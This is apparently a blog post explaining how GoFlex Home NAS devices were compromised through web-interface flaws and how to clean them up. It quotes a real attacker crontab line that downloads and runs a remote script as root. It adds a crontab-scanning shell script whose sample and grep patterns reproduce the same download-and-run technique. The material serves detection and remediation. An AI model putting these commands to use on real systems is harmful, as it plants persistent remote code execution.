Some time back I posted about the GoFlex Home inbuilt firewall (iptables) to protect against hackers. If you are worried about getting hacked and are looking for a solution, that post may be useful. The problem I realize now is that many users don't know they have been hacked - all they know is that the web interface stops working a short time after booting up their GoFlex Home.
How did you get hacked?
The GoFlex Home web API has vulnerabilities which allow an unauthorised user to upload files and run scripts. It seems that Seagate knew about this but instead of alerting everyone they just shut down remote access through their seagateshare server. Shutting down seagateshare just means that you can’t access your own GoFlex Home remotely through seagateshare, but as long as port 80 is open hackers can still access your device.
I should mention that port 80 is just the default http port. The problems are in the web interface itself and getting the web server to listen on a different port won't fix the problem.
Hackers will find and exploit any open ports.
What do the hackers do?
I haven’t been hacked, but here’s an example of an entry created in /etc/crontab that another user found after reporting problems with the web interface:
*/15 * * * * root ps -A | grep -q .nttpd && exit 0; cd /tmp; rm -f wznsR.sh; wget http://188.92.74.189/wznsR.sh; chmod +x wznsR.sh; ./wznsR.sh
This downloads a script file from a remote server in Latvia every 15 minutes and runs it. I haven’t looked into what wznsR.sh does and it doesn’t matter: you don’t want some guy in Latvia running scripts on your GoFlex Home, unless you are that guy in Latvia.
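A quick way to check a crontab for this kind of download-and-run entry, as an added example that is not part of the original post. The patterns are a heuristic assumed from the entry above, the function names are hypothetical, and the sample crontab is constructed (192.0.2.10 is a documentation-only address):

```shell
#!/bin/sh
# Added example: heuristic scan of a crontab for entries that fetch a file
# from a URL and then make it executable or run it.

# scan_crontab FILE
# Prints "LINENO:entry" for each suspicious line.
# Exit status is 0 if at least one such line was found, 1 otherwise.
scan_crontab() {
    # 1) drop comments and blank lines, keeping the original line numbers
    # 2) keep lines that fetch something from a URL
    # 3) keep lines that also chmod +x, run ./something, or pipe into a shell
    grep -n -v -E '^[[:space:]]*(#|$)' "$1" |
        grep -E '(wget|curl)[[:space:]].*(https?|ftp)://' |
        grep -E 'chmod[[:space:]]+\+x|(^|[;&[:space:]])\./|\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# write_sample FILE
# Writes a constructed sample crontab: two harmless jobs (one of which uses
# wget but never executes anything) and one download-and-run job.
write_sample() {
    cat > "$1" <<'EOF'
# /etc/crontab (constructed sample)
SHELL=/bin/sh
17 * * * * root run-parts /etc/cron.hourly
0 3 * * * root wget -q -O /dev/null http://192.0.2.10/ping
*/15 * * * * root ps -A | grep -q .example && exit 0; cd /tmp; rm -f sample.sh; wget http://192.0.2.10/sample.sh; chmod +x sample.sh; ./sample.sh
EOF
}

# When a file name is given on the command line, scan that file.
if [ "$#" -gt 0 ]; then
    scan_crontab "$1"
fi
```

Saved under a name of your choice (scan.sh here), run it as `sh scan.sh /etc/crontab`. No output only means no entry matched these patterns, not that the device is clean.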
How to fix it?
The first thing is to turn off port forwarding on ports 80 and 443 (http and https). That won’t stop that script downloading and running every 15 minutes but will stop you getting hacked again while you are cleaning up.
You can delete the crontab entry manually, but I don’t know what else they might have done so I recommend reflashing the firmware using my reflash without seagateshare post to get back to factory settings.
Think about whether you really need remote access to the web interface.
Don’t even think about opening up ports 80 and 443 unless you apply the IP whitelist tip in my iptables post; otherwise you’re just asking to be hacked again. The safest option is not to open those ports at all.
I access files remotely on my GoFlex Home with SFTP either using WinSCP on a Windows machine or AndFTP on Android. FTPManager on iOS gets good reviews, but I haven’t used it myself.
The file sharing features of the web interface with email links don’t work without seagateshare and there are plenty of alternatives to hosting fileshares on your own home server.